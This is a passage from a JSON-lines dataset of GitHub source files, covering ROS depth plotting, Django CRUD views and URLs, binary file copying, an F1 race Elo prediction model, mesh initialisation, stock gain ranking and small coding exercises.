{"seq_id":"1226296925","text":"#!/usr/bin/env python\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport roslib\n#roslib.load_manifest('my_package')\nimport cv2\nimport rospy\nimport sys\nimport imutils\nfrom std_msgs.msg import String\nfrom sensor_msgs.msg import Image\nfrom itertools import islice\nfrom cv_bridge import CvBridge, CvBridgeError\n\nbridge = CvBridge()\n\ndepth_img = []\nimg_arr = np.array([[0],[0]])\n\ndef depthCallback(data):\n\tglobal depth_img\n\tglobal img_arr\n\timg_arr = np.fromstring(data.data, np.uint8)\n\t#depth_ball = data.data[int(img_ballx),int(img_bally)]\n\timg_arr = img_arr[2::4].copy()\n\timg_arr.resize(480,640)\n\tprint(img_arr[240,320])\n\ndef main():\n\tprint("hello")\n\tglobal depth_img\n\tglobal img_arr\n\trospy.init_node("depthTest")\n\tdepth_sub = rospy.Subscriber("/camera/depth_registered/image_raw",Image,depthCallback)\n\trate = rospy.Rate(10)\n\n\tfig = plt.figure()\n\tax = fig.add_subplot(111)\n\tplt.ion()\n\tplt.plot()\n\n\twhile not rospy.is_shutdown():\n\t\trospy.wait_for_message("/camera/depth_registered/image_raw",Image)\n\t\tprint("yo")\n\t\t#depth_img = np.array(depth_img)\n\t\t#depth_img.shape = (depth_img.size//640*2,640*2)\n\t\t#print(type(depth_img))\n\t\tpos = plt.imshow(img_arr[:,:])\n\t\tnp.savetxt("foo.csv",img_arr[240-20:240+20,320-20:320+20],delimiter=',')\n\t\t#fig.colorbar(pos)\n\t\tplt.pause(0.2)\n\t\tplt.show()\n\t\trate.sleep()\n\nif __name__=='__main__':\n\tmain()\n","repo_name":"johnhanckel/AMRClass","sub_path":"Robotics All 
Code/depthcloud_play.py","file_name":"depthcloud_play.py","file_ext":"py","file_size_in_byte":1336,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"11516641671","text":"from django.shortcuts import render, redirect, get_object_or_404,get_list_or_404\nfrom .models import *\nfrom django.views.generic import ListView\nfrom .forms import *\n\n# Create your views here.\ndef home(request):\n data ={\n 'products' : Product.objects.all(),\n }\n\n return render(request, 'Home.html', data)\n\n\ndef createProduct(request):\n data = {\n 'form': ProductForm()\n }\n if request.method == 'POST':\n formulario = ProductForm(data=request.POST)\n if formulario.is_valid():\n formulario.save()\n data['mensaje'] = \"Guardado Correctamente\"\n else:\n data[\"form\"] = formulario\n return render(request, 'product/createProduct.html', data)\n\ndef editProduct(request, id_product):\n products= get_object_or_404(Product, id_product=id_product)\n data = {\n 'form': ProductForm(instance=products)\n }\n\n if request.method == 'POST':\n formulario=ProductForm(data=request.POST, instance= products,)\n if formulario.is_valid():\n formulario.save()\n return redirect(to='/')\n data['form'] = formulario\n return render(request,'product/editProduct.html', data )\n\ndef deleteProduct(request,id_product):\n product=Product.objects.get(id_product=id_product)\n product.delete()\n return redirect('/')\n\ndef listTypeProduct(request):\n productTypeList=ProductType.objects.all()\n return render(request, 'TypeProduct/listTypeProduct.html', {'productTypeList': productTypeList})\n\ndef createProductType(request):\n data = {\n 'form': ProductTypeForm()\n }\n if request.method == 'POST':\n formulario = ProductTypeForm(data=request.POST)\n if formulario.is_valid():\n formulario.save()\n return redirect(to='listTypeProduct')\n else:\n data[\"form\"] = formulario\n return render(request, 'TypeProduct/createProductType.html', data )\n\ndef editProductType(request, id_product_type):\n products_type= get_object_or_404(ProductType, id_product_type=id_product_type)\n data = {\n 'form': ProductTypeForm(instance=products_type)\n }\n\n if request.method == 'POST':\n formulario=ProductTypeForm(data=request.POST, instance= products_type)\n if formulario.is_valid():\n formulario.save()\n return redirect(to='listTypeProduct')\n data['form'] = formulario\n return render(request,'TypeProduct/editProductType.html', data )\n\ndef deleteProductType(request,id_product_type):\n productType=ProductType.objects.get(id_product_type=id_product_type)\n productType.delete()\n return redirect(to='listTypeProduct')\n\ndef listProvider(request):\n provider=ProductProvider.objects.all()\n return render(request, 'Provider/listProvider.html', {'provider': provider})\n\ndef providerData(request,id_provider):\n providers = get_object_or_404(Provider, id_provider=id_provider)\n data = {\n 'form': ProviderForm(instance=providers)\n }\n\n if request.method == 'POST':\n formulario = ProviderForm(data=request.POST, instance=providers, )\n if formulario.is_valid():\n formulario.save()\n return redirect(to='listProvider')\n data['form'] = formulario\n return render(request, 'Provider/providerData.html', data)\n\ndef list2Provider(request):\n provider=Provider.objects.all()\n return render(request, 'Provider/gestionProvider.html', {'provider': provider})\n\ndef createProvider(request):\n data = {\n 'form': ProviderForm()\n }\n if request.method == 'POST':\n formulario = ProviderForm(data=request.POST)\n if 
formulario.is_valid():\n formulario.save()\n return redirect(to='list2Provider')\n else:\n data[\"form\"] = formulario\n return render(request, 'Provider/createProvider.html', data)\n\ndef deleteProvider(request,id_provider):\n provider = Provider.objects.get(id_provider=id_provider)\n provider.delete()\n return redirect(to='list2Provider')\n\n\ndef createProductProvider(request):\n data = {\n 'form': ProductProviderForm()\n }\n if request.method == 'POST':\n formulario = ProductProviderForm(data=request.POST)\n if formulario.is_valid():\n formulario.save()\n return redirect(to='listProvider')\n else:\n data[\"form\"] = formulario\n return render(request, 'Provider/createProductProvider.html', data)","repo_name":"SergioSm12/SupermarketDjangoDos","sub_path":"project/xyz/Apps/Sales/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4425,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"22439012699","text":"# 이진 파일\n\n# 1. 이진 파일에서 바이트 읽기\nfilename = \"cat.jpg\"\ninfile = open(filename, \"rb\") #이진파일 읽기\nbytesArray = infile.read(8) #입력파일에서 8바이트 읽기\nbyte1 = bytesArray[0] # 첫번째 바이트 꺼내기\ninfile.close()\n\n\n# 2. 이진 파일에 바이트 저장하기\nfilename = \"out.aaa\"\noutfile = open(filename, \"wb\")\nbytesArray = bytes([255, 128, 0, 1])\noutfile.write(bytesArray)\noutfile.close()\n\n\n# 3. 이진 파일 복사하기\ninfile = open(\"123.png\", \"rb\")\noutfile = open(\"kkk.png\", \"wb\")\n\n\n# 4. 입력 파일에서 1024 바이트씩 읽어서 출력 파일에 쓴다. \nwhile True:\n copy_buffer = infile.read(1024)\n if not copy_buffer:\n break\n outfile.write(copy_buffer)\n\ninfile.close()\noutfile.close()\nprint(str(infile)+\"를 \" +str(outfile)+\"로 복사하였습니다. \")\n\n","repo_name":"peterchokr/python","sub_path":"src/chap10/p355_binary.py","file_name":"p355_binary.py","file_ext":"py","file_size_in_byte":855,"program_lang":"python","lang":"ko","doc_type":"code","stars":3,"dataset":"github-code","pt":"48"} +{"seq_id":"16769735480","text":"from django.urls import path\n\nfrom apps.customer.views import (\n OrderFormView, CartView, ProductCustomerView, ShopCustomerView,\n IndexCustomerView, ProductAddToCartView, ProductIncreaseView,\n ProductDecreaseView, ProductRemoveFromCartView, GetPaymentResponse\n)\n\n\nurlpatterns = [\n path('buy-product/', OrderFormView.as_view(), name='buy-product'),\n path('paybox-order/', GetPaymentResponse.as_view(), name='get_payment_response'),\n path('cart/', CartView.as_view(), name='cart'),\n path('add//', ProductAddToCartView.as_view(), name='cart_add'),\n path('remove//', ProductRemoveFromCartView.as_view(), name='cart_remove'),\n path('decrease//', ProductDecreaseView.as_view(), name='product_decrease'),\n path('increase//', ProductIncreaseView.as_view(), name='product_increase'),\n path('shop//', ShopCustomerView.as_view(), name='shop-customer'),\n path('/', IndexCustomerView.as_view(), name='index-customer'),\n path('shop///', ProductCustomerView.as_view(), name='product-customer'),\n]\n","repo_name":"nbdbkv/taplink","sub_path":"apps/customer/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1148,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"21415475916","text":"from typing import List\nimport pytest\n\nfrom ..app import app, client\nfrom ..models.groups import GroupDetailed\n\n\nclass TestGroups:\n # @pytest.mark.get_groups\n def test_route_exist(self) -> None:\n res = client.get(\n app.url_path_for('get groups'),\n json={},\n )\n assert res.status_code == 200\n\n # 
@pytest.mark.get_groups\n def test_invalid_ouput_raise_error(self) -> None:\n res = client.get(\n app.url_path_for(\"get groups\"),\n )\n assert res.json() == List[GroupDetailed]\n","repo_name":"pvenv/swimmy","sub_path":"docker/fastapi/swimmy/tests/test_auth.py","file_name":"test_auth.py","file_ext":"py","file_size_in_byte":554,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"30173863051","text":"import statistics\n\nfrom f1predict.race.EloModel import EloModel, EloDriver, EloConstructor, EloEngine\nfrom f1predict.race.retirementBlame import getRetirementBlame\n\nRETIREMENT_PENALTY = -1.8\nFINISHING_BONUS = 0.1\nBASE_RETIREMENT_PROBABILITY = 0.1\nRETIREMENT_PROBABILITY_CHANGE_TRACK = 0.33\nRETIREMENT_PROBABILITY_CHANGE_DRIVER = 0.10\nROOKIE_DRIVER_RATING = 1820\n\nclass DataProcessor:\n def __init__(self, seasonsData, raceResultsData, driversData, constructorsData, enginesData):\n self.seasonsData = seasonsData\n self.raceResultsData = raceResultsData\n self.driversData = driversData\n self.constructorsData = constructorsData\n self.enginesData = enginesData\n self.model = None\n\n def processDataset(self):\n self.model = EloModel({}, {}, {}, {})\n self.predictions = []\n for year, season in self.seasonsData.items(): # Read every season:\n self._updateModelsForYear(season)\n racesAsList = list(season.races.items())\n racesAsList.sort(key=lambda x: x[1].round)\n\n for raceId, data in racesAsList:\n if raceId in self.raceResultsData and self.raceResultsData[raceId]:\n results = self.raceResultsData[raceId]\n self._addNewDriversAndConstructors(results, year)\n self.model.addNewCircuit(data.circuitId)\n\n gaElos = {}\n classified = []\n retired = []\n for index, res in enumerate(results):\n self.model.addNewCircuitToParticipant(res[\"driverId\"], data.circuitId)\n gaElos[res[\"driverId\"]] = self.model.getGaElo(\n res[\"driverId\"], res[\"grid\"], data.circuitId)\n if res[\"position\"] is None:\n retired.append((res[\"driverId\"], res[\"status\"]))\n else:\n classified.append(res[\"driverId\"])\n\n # Generate predictions:\n sortedGaElos = [(driverId, gaElo) for (driverId, gaElo) in gaElos.items()]\n sortedGaElos.sort(key=lambda x: x[1], reverse=True)\n if sortedGaElos: # TODO is this if-check necessary?\n self.predictions.append([x[0] for x in sortedGaElos])\n\n # Adjust models based on race results\n eloAdjustments, alphaAdjustment = self._calculateTrackAlphaAdjustmentAndBestEloAdjustments(\n classified, results, data.circuitId)\n self._adjustEloRatings(classified, retired, eloAdjustments, data.circuitId)\n self._adjustRetirementFactors(retired, classified, data.circuitId)\n self.model.adjustCircuitAplha(\n alphaAdjustment, data.circuitId)\n\n\n # Returns the generated EloModel from the last processing, or an empty model if the function was not called yet\n def getModel(self):\n return self.model\n\n # Returns a list of all generated predictions from the last processing\n # Throws an exception if called before processing a dataset\n def getPredictions(self):\n if self.predictions == None:\n raise AssertionError(\n \"Predictions not generated yet! 
Call before calling me.\")\n return self.predictions\n\n def _updateModelsForYear(self, season):\n '''Resolves team name changes'''\n # Updating list of engines and constructors:\n for new, old in season.teamChanges.items():\n self.model.constructors[new] = self.model.constructors[old]\n self.model.constructors[new].name = self.constructorsData[new]\n\n for cId, engineId in season.constructorEngines.items():\n # Check that the constructor and engine exist\n if engineId not in self.model.engines:\n self.model.engines[engineId] = EloEngine(\n self.enginesData[engineId])\n if cId not in self.model.constructors:\n self.model.constructors[cId] = EloConstructor(\n self.constructorsData[cId], None)\n # Assign it its engine\n self.model.constructors[cId].engine = self.model.engines[engineId]\n\n def _updateModelsAtEndOfYear(self, season):\n # Delete old, unused constructors\n for new, old in season.teamChanges.items():\n del self.model.constructors[old]\n\n # Regress all powers towards the mean\n # TODO\n\n def _addNewDriversAndConstructors(self, resultsForRace, year):\n for res in resultsForRace:\n if res[\"driverId\"] not in self.model.drivers:\n self.model.drivers[res[\"driverId\"]] = EloDriver(\n self.driversData[res[\"driverId\"]], res[\"constructorId\"])\n if year > 2003:\n self.model.drivers[res[\"driverId\"]\n ].rating = ROOKIE_DRIVER_RATING\n if self.model.drivers[res[\"driverId\"]].constructor is not self.model.constructors[res[\"constructorId\"]]:\n self.model.drivers[res[\"driverId\"]\n ].constructor = self.model.constructors[res[\"constructorId\"]]\n\n def _calculateTrackAlphaAdjustmentAndBestEloAdjustments(self, driverIDs, resultsForRace, circuitId):\n eloAdjustments = ()\n eloAdjustmentsSum = None\n bestAdjustment = 0\n adjustments = [0.9, 0.91, 0.92, 0.93, 0.94, 0.95, 0.96, 0.97, 0.98,\n 0.99, 1, 1.01, 1.02, 1.03, 1.04, 1.05, 1.06, 1.07, 1.08, 1.09, 1.1]\n for alphaAdjustment in adjustments:\n results = {}\n gaElos = {}\n for index, res in enumerate(resultsForRace):\n results[res[\"driverId\"]] = res[\"position\"]\n gaElos[res[\"driverId\"]] = self.model.getGaEloWithTrackAlpha(\n res[\"driverId\"], res[\"grid\"], circuitId, alphaAdjustment)\n curEloAdjustments = self._calculateEloAdjustments(driverIDs, gaElos, results)\n curEloAdjustmentsSum = 0\n curEloAdjustmentsSum += statistics.mean(map(abs, curEloAdjustments[0].values()))\n curEloAdjustmentsSum += statistics.mean(map(abs, curEloAdjustments[1].values()))\n curEloAdjustmentsSum += statistics.mean(map(abs, curEloAdjustments[2].values()))\n\n if not eloAdjustmentsSum or curEloAdjustmentsSum < eloAdjustmentsSum:\n eloAdjustmentsSum = curEloAdjustmentsSum\n eloAdjustments = curEloAdjustments\n bestAdjustment = alphaAdjustment\n return eloAdjustments, bestAdjustment\n\n def _calculateEloAdjustments(self, driverIDs, gaElos, results):\n driverAdjustments = {}\n engineAdjustments = {}\n constructorAdjustments = {}\n for i in range(len(driverIDs)):\n for k in range(i+1, len(driverIDs)):\n if driverIDs[i] not in driverAdjustments:\n driverAdjustments[driverIDs[i]] = 0\n if driverIDs[k] not in driverAdjustments:\n driverAdjustments[driverIDs[k]] = 0\n\n if self.model.drivers[driverIDs[i]].constructor not in constructorAdjustments:\n constructorAdjustments[self.model.drivers[driverIDs[i]].constructor] = 0\n if self.model.drivers[driverIDs[k]].constructor not in constructorAdjustments:\n constructorAdjustments[self.model.drivers[driverIDs[k]].constructor] = 0\n\n if self.model.drivers[driverIDs[i]].constructor.engine not in 
engineAdjustments:\n engineAdjustments[self.model.drivers[driverIDs[i]\n ].constructor.engine] = 0\n if self.model.drivers[driverIDs[k]].constructor.engine not in engineAdjustments:\n engineAdjustments[self.model.drivers[driverIDs[k]\n ].constructor.engine] = 0\n\n headToHeadResult = 1 if results[driverIDs[i]] < results[driverIDs[k]] else 0\n expectedScore = self.model.getExpectedScore(\n gaElos[driverIDs[i]], gaElos[driverIDs[k]])\n driverAdjustments[driverIDs[i]] += headToHeadResult - expectedScore\n driverAdjustments[driverIDs[k]] += expectedScore - headToHeadResult\n\n constructorAdjustments[self.model.drivers[driverIDs[i]\n ].constructor] += headToHeadResult - expectedScore\n constructorAdjustments[self.model.drivers[driverIDs[k]\n ].constructor] += expectedScore - headToHeadResult\n\n engineAdjustments[self.model.drivers[driverIDs[i]\n ].constructor.engine] += headToHeadResult - expectedScore\n engineAdjustments[self.model.drivers[driverIDs[k]\n ].constructor.engine] += expectedScore - headToHeadResult\n\n return (driverAdjustments, constructorAdjustments, engineAdjustments)\n\n def _adjustEloRatings(self, classified, retired, eloAdjustments, circuitId):\n for driverId in classified:\n self.model.adjustEloRating(\n driverId, eloAdjustments[0][driverId] + FINISHING_BONUS, circuitId)\n for (driverId, _) in retired:\n self.model.adjustEloRating(\n driverId, RETIREMENT_PENALTY, circuitId)\n\n for constructor in eloAdjustments[1]:\n self.model.adjustEloRatingConstructor(\n constructor, eloAdjustments[1][constructor], circuitId)\n\n for engine in eloAdjustments[2]:\n self.model.adjustEloRatingEngine(\n engine, eloAdjustments[2][engine], circuitId)\n\n def _adjustRetirementFactors(self, retired, classified, circuitID):\n const_retirements = {}\n eng_retirements = {}\n all_retirements = []\n \n # Process drivers who were classified in the race\n for driverID in classified:\n if self.model.drivers[driverID].constructor not in const_retirements:\n const_retirements[self.model.drivers[driverID].constructor] = []\n if self.model.drivers[driverID].constructor.engine not in eng_retirements:\n eng_retirements[self.model.drivers[driverID].constructor.engine] = []\n\n all_retirements.append(0)\n self.model.drivers[driverID].retirementProbability *= 1-RETIREMENT_PROBABILITY_CHANGE_DRIVER\n const_retirements[self.model.drivers[driverID].constructor].append(0)\n eng_retirements[self.model.drivers[driverID].constructor.engine].append(0)\n\n # Process drivers who retired from the race \n for (driverID, retirementReason) in retired:\n if self.model.drivers[driverID].constructor not in const_retirements:\n const_retirements[self.model.drivers[driverID].constructor] = []\n if self.model.drivers[driverID].constructor.engine not in eng_retirements:\n eng_retirements[self.model.drivers[driverID].constructor.engine] = []\n\n all_retirements.append(1)\n blame = getRetirementBlame(retirementReason)\n self.model.drivers[driverID].retirementProbability = (3 * blame[0] * RETIREMENT_PROBABILITY_CHANGE_DRIVER) + \\\n (1-RETIREMENT_PROBABILITY_CHANGE_DRIVER) * self.model.drivers[driverID].retirementProbability\n const_retirements[self.model.drivers[driverID].constructor].append(blame[1])\n eng_retirements[self.model.drivers[driverID].constructor.engine].append(blame[2])\n\n # Adjust overall retirement factor \n self.model.overallRetirementProbability = statistics.mean(all_retirements) * \\\n RETIREMENT_PROBABILITY_CHANGE_DRIVER + (1-RETIREMENT_PROBABILITY_CHANGE_DRIVER) \\\n * self.model.overallRetirementProbability\n 
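# NOTE (editorial annotation, not in the original source): the assignment above\n        # is an exponential moving average, new = a * mean(obs) + (1 - a) * old, with\n        # a = RETIREMENT_PROBABILITY_CHANGE_DRIVER, so older races decay geometrically.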
\n # Adjust track retirement factors\n if circuitID not in self.model.tracksRetirementFactor:\n self.model.tracksRetirementFactor[circuitID] = BASE_RETIREMENT_PROBABILITY\n oldValue = self.model.tracksRetirementFactor[circuitID]\n self.model.tracksRetirementFactor[circuitID] += (statistics.mean(all_retirements) -\n oldValue) * RETIREMENT_PROBABILITY_CHANGE_TRACK\n \n # Adjust constructor factors\n for constructor, blames in const_retirements.items():\n newValue = statistics.mean(blames)\n constructor.retirementProbability = (3 * newValue * RETIREMENT_PROBABILITY_CHANGE_DRIVER) + \\\n (1-RETIREMENT_PROBABILITY_CHANGE_DRIVER) * constructor.retirementProbability\n\n # Adjust engine factors\n for engine, blames in eng_retirements.items():\n newValue = statistics.mean(blames)\n engine.retirementProbability = (3 * newValue * RETIREMENT_PROBABILITY_CHANGE_DRIVER) + \\\n (1-RETIREMENT_PROBABILITY_CHANGE_DRIVER) * engine.retirementProbability\n","repo_name":"villekuosmanen/F1Predict","sub_path":"f1predict/race/DataProcessor.py","file_name":"DataProcessor.py","file_ext":"py","file_size_in_byte":13072,"program_lang":"python","lang":"en","doc_type":"code","stars":35,"dataset":"github-code","pt":"48"} +{"seq_id":"41849213485","text":"Max=int(input('输入斐波那契数列的最大项数:'))\n\ndef fab(Max):\n n,a,b=0,0,1\n while n 0:\n# vertices.append((x, y, 50))\n# inh = True\n# inv = True\n# else:\n# vertices.append((x, y, 0))\n# if inv:\n# inv = False\n# edgeVertices.append(vertCount)\n# elif inh:\n# inh = False\n# edgeVertices.append(vertCount)\n# vertCount += 1\n\n# faces = []\n# for y in range(image.height - 1):\n# for x in range(image.width - 1):\n# offset = y * image.width + 1 # vertex index in obj-format starts at 1\n# # relative vertex positions: [u]pper, [l]ower / [l]eft, [r]ight\n# ul, ur, ll, lr = (offset + x, offset + x + 1,\n# offset + image.width + x, offset + image.width + x + 1)\n# # two triangles per square: upper left and lower right\n# faces.append((ul, ur, ll))\n# faces.append((ll, ur, lr))\n\n# verticesToRemove = []\n# for i, v in enumerate(vertices):\n# if v[2] == 0:\n# verticesToRemove.append(i)\n# verticesToRemove = set(verticesToRemove) - set(edgeVertices)\n\n# facesToRemove = []\n# for i, f in enumerate(faces):\n# if set(f).issubset(verticesToRemove):\n# facesToRemove.append(i)\n \n# # verticesToKeep = set(range(len(vertices))) - set(verticesToRemove)\n# # newVertices = [vertices[i] for i in verticesToKeep]\n \n# facesToKeep = set(range(len(faces))) - set(facesToRemove)\n# newFaces = [faces[i] for i in facesToKeep]\n\n# return vertices, newFaces\n\n# def get_back(image, vertices, offset):\n# faces = []\n# for y in range(image.height - 1):\n# for x in range(image.width - 1):\n# offset = y * image.width + 1 # vertex index in obj-format starts at 1\n# # relative vertex positions: [u]pper, [l]ower / [l]eft, [r]ight\n# ul, ur, ll, lr = (offset + x, offset + x + 1,\n# offset + image.width + x, offset + image.width + x + 1)\n# # two triangles per square: upper left and lower right\n# faces.append((ul, ur, ll))\n# faces.append((ll, ur, lr))\n\n# verticesToRemove = []\n# for i, v in enumerate(vertices):\n# if v[2] > 0:\n# verticesToRemove.append(i)\n# verticesToRemove = set(verticesToRemove) - set(edgeVertices)\n\n# facesToRemove = []\n# for i, f in enumerate(faces):\n# if not set(f).isdisjoint(verticesToRemove):\n# facesToRemove.append(i)\n \n# # verticesToKeep = set(range(len(vertices))) - set(verticesToRemove)\n# # newVertices = [vertices[i] for i in verticesToKeep]\n \n# facesToKeep = 
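Editorial aside on the DataProcessor record that closes above: its pairwise rating adjustments call self.model.getExpectedScore, which is defined elsewhere in that repository and not shown here. The standalone sketch below illustrates the standard logistic Elo win expectancy such a method conventionally computes; the function name, the 400-point spread constant, and the sample ratings are illustrative assumptions, not code taken from the record.

def elo_expected_score(rating_a, rating_b, spread=400.0):
    # Probability that A finishes ahead of B under the classic logistic Elo curve.
    # (Hypothetical helper; the record's getExpectedScore is assumed equivalent.)
    return 1.0 / (1.0 + 10 ** ((rating_b - rating_a) / spread))

# Each head-to-head comparison contributes (actual - expected) to one side and
# its negation to the other, mirroring _calculateEloAdjustments above.
expected = elo_expected_score(1820.0, 1900.0)  # e.g. a rookie against a stronger driver
actual = 1.0                                   # the rookie finished ahead
print(round(expected, 3), round(actual - expected, 3))  # prints 0.387 0.613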
set(range(len(faces))) - set(facesToRemove)\n# newFaces = [faces[i] for i in facesToKeep]\n\n# newNewFaces = []\n# for f in newFaces:\n# newF = (f[0] + offset, f[1] + offset, f[2] + offset)\n# newNewFaces.append(newF)\n\n# return vertices, newFaces\n\n# def main(im, outpath, scale):\n# im = Image.open(im)#.resize((64,64))\n \n# scale = float(scale)\n# print('Image: size={}x{}, mode={}'.format(*im.size, im.mode))\n# print('Polygon count: {}'.format(2 * (im.width -1) * (im.height - 1)))\n# # vertices = create_vertices(im, scale)\n# # faces = create_faces(im, *im.size)\n# vertices, faces = get_front_and_sides(im)\n# back_v, back_f = get_back(im, len(vertices))\n# vertices = vertices + back_v\n# faces = faces + back_f\n# with open(outpath, 'w') as outfile:\n# for v in vertices:\n# outfile.write('v {} {} {}\\n'.format(*v))\n# for f in faces:\n# outfile.write('f {} {} {}\\n'.format(*f))\n\n# main('data/aloi/sil_grey_256/1/1_r0.png', 'testmesh/out.obj', 1.)\n\nimport numpy as np\nimport torch\n\nclass Initialiser:\n def __init__(self, image, im_dim=256):\n self.visible = (image[0] > 0).astype(int)\n self.objheight, self.top = self.vert()\n self.objwidth, self.left = self.horiz()\n self.im_dim = im_dim\n\n def vert(self):\n rows = []\n for i, row in enumerate(self.visible):\n if np.isin(1, row):\n rows.append(i)\n return rows[len(rows)-1] - rows[0], rows[0]\n\n def horiz(self):\n cols = []\n for i, col in enumerate(np.transpose(self.visible)):\n if np.isin(1, col):\n cols.append(i)\n return cols[len(cols)-1] - cols[0], cols[0]\n\n def initialise(self, mesh, orig_rad = 90):\n width_scale = orig_rad / (self.objwidth/2)\n height_scale = orig_rad / (self.objheight/2)\n\n self.horizontal_scale(mesh, width_scale)\n self.vertical_scale(mesh, height_scale)\n \n orig_top = (self.im_dim/2) - orig_rad/height_scale\n orig_left = (self.im_dim/2) - orig_rad/width_scale\n shift_per_pixel = 1/orig_rad\n horiz_shift = (orig_left - self.left) * shift_per_pixel\n vert_shift = (orig_top - self.top) * shift_per_pixel\n\n self.horizontal_shift(mesh, horiz_shift)\n self.vertical_shift(mesh, vert_shift)\n\n print(\"\\n\")\n print(\"w scale: \", width_scale)\n print(\"orig_rad: \", orig_rad)\n print(\"img left: \", self.left)\n print(\"sphere left: \", orig_left)\n print(\"horiz shift: \", horiz_shift)\n print(\"width per pixel: \", shift_per_pixel)\n print(\"\\n\")\n print(\"h scale: \", height_scale)\n print(\"orig_rad: \", orig_rad)\n print(\"img top: \", self.top)\n print(\"sphere top: \", orig_top)\n print(\"vert shift: \", vert_shift)\n print(\"height per pixel: \", shift_per_pixel)\n print(\"\\n\")\n\n def horizontal_scale(self, mesh, scale):\n x = torch.transpose(mesh.vertices[0], 0, 1)[0]\n x = torch.unsqueeze((x / scale), 0)\n i = torch.arange(mesh.vertices[0].size(0)).long()\n mesh.vertices[0,i,0] = x\n\n def vertical_scale(self, mesh, scale):\n y = torch.transpose(mesh.vertices[0], 0, 1)[1]\n y = torch.unsqueeze((y / scale), 0)\n i = torch.arange(mesh.vertices[0].size(0)).long()\n mesh.vertices[0,i,1] = y\n\n def horizontal_shift(self, mesh, shift):\n x = torch.transpose(mesh.vertices[0], 0, 1)[0]\n x = torch.unsqueeze((x - shift), 0)\n i = torch.arange(mesh.vertices[0].size(0)).long()\n mesh.vertices[0,i,0] = x\n\n def vertical_shift(self, mesh, shift):\n y = torch.transpose(mesh.vertices[0], 0, 1)[1]\n y = torch.unsqueeze((y + shift), 0)\n i = torch.arange(mesh.vertices[0].size(0)).long()\n mesh.vertices[0,i,1] = 
y","repo_name":"realdingke/L335_project","sub_path":"examples/init_mesh.py","file_name":"init_mesh.py","file_ext":"py","file_size_in_byte":8590,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"40311972566","text":"#coding=utf-8\n\nimport pandas as pd\n\ndef findlastindexof(ticker,allgp,indexlist):\n for ind in indexlist:\n if allgp['ticker'][ind] == ticker:\n break\n return ind\n\ndef zfrankin(timeperiod,begindate,_tradedate,gc,x=0.5,howlong=90):\n \"\"\"\n 计算股票涨幅排名\n\n Parameters\n ----------\n timeperiod : 排名时间段\n begindate : 交易数据开始时间,最好取早于timeperiod的时间,给非交易日留点缓冲\n _tradedate : 统计结束时间\n gc : 要统计的股票列表\n x : 涨幅标准\n howlong : 次新股标准 \n Examples\n --------\n\n Returns\n -------\n list : 涨幅大于X,上市时间超过howlong的股票列表\n \"\"\"\n allgp = DataAPI.MktEqudAdjGet(beginDate=begindate,endDate=_tradedate,secID=gc,isOpen='1',pandas='1')\n _highest = _turnrate = _ticker = 0\n _lowest = 99999999\n _zfdit ={}\n _ticker = allgp['ticker'].iloc[0]\n _indexlist = sorted(allgp['ticker'].index,reverse=True)\n _tickerlastindex = findlastindexof(_ticker,allgp,_indexlist)\n _tickertime = _tickerlastindex+1\n #print _ticker,_tickerlastindex,len(_indexlist)\n for _r in allgp.iterrows():\n if _ticker != _r[1]['ticker']:\n if(_turnrate > 1):\n _zfdit[_ticker]=[_ticker,_highest/_lowest-1.,_turnrate]\n _ticker = _r[1]['ticker']\n _highest=_turnrate=0\n _lowest=99999999\n _tickerlastindex = findlastindexof(_ticker,allgp,_indexlist)\n _tickertime = _tickerlastindex - _r[0]+1\n if _tickerlastindex - _r[0] > timeperiod:\n continue\n _highest = max(_highest,_r[1]['highestPrice'])\n _lowest = min(_lowest,_r[1]['lowestPrice'])\n _turnrate = _turnrate + _r[1]['turnoverRate']\n zfranklist = [ v for v in sorted(_zfdit.values(),key=lambda x:x[1],reverse=True)]\n zfranklist = [j for (i,j) in enumerate(zfranklist) if j[1] >= x and len(DataAPI.MktEqudAdjGet(endDate=_tradedate,ticker=j[0],isOpen='1',pandas='1'))>howlong]\n return zfranklist\n#zfrankin(10,'20170101','20170208',['000001.XSHE','000002.XSHE'])","repo_name":"fswzb/MT","sub_path":"lib.zfrank.py","file_name":"lib.zfrank.py","file_ext":"py","file_size_in_byte":2110,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"2784985067","text":"'''\nWrite a function to find the longest common prefix string amongst an array of strings.\n\nIf there is no common prefix, return an empty string \"\".\n\nExample 1:\n\nInput: [\"flower\",\"flow\",\"flight\"]\nOutput: \"fl\"\nExample 2:\n\nInput: [\"dog\",\"racecar\",\"car\"]\nOutput: \"\"\nExplanation: There is no common prefix among the input strings.\n\n'''\ndef checkequality(arr,index):\n ch = arr[0][index]\n for i in arr:\n if i[index] != ch:\n return 1\n return 0\n\ndef longestCommonPrefix(strs):\n flag = 0\n prefix = \"\"\n if len(strs) == 0:\n return \"\"\n min_length = len(strs[0])\n for i in strs:\n if len(i) 1:\n q.enqueue(int(line[1]))\n else:\n out.write(str(q.dequeue()) + '\\n')\n\nout.close()\n","repo_name":"shivammehta25/Fun-Coding","sub_path":"EDXCourseITMO/Week2/queue_collections.py","file_name":"queue_collections.py","file_ext":"py","file_size_in_byte":556,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"811345591","text":"import json\nimport time\nimport datetime\nimport os\nfrom termcolor import colored\nimport pandas as pd\n\ndef print_exception(e, addicional_info, logger = None):\n error_type = type(e).__name__\n error_message = e.args[0]\n msg = 
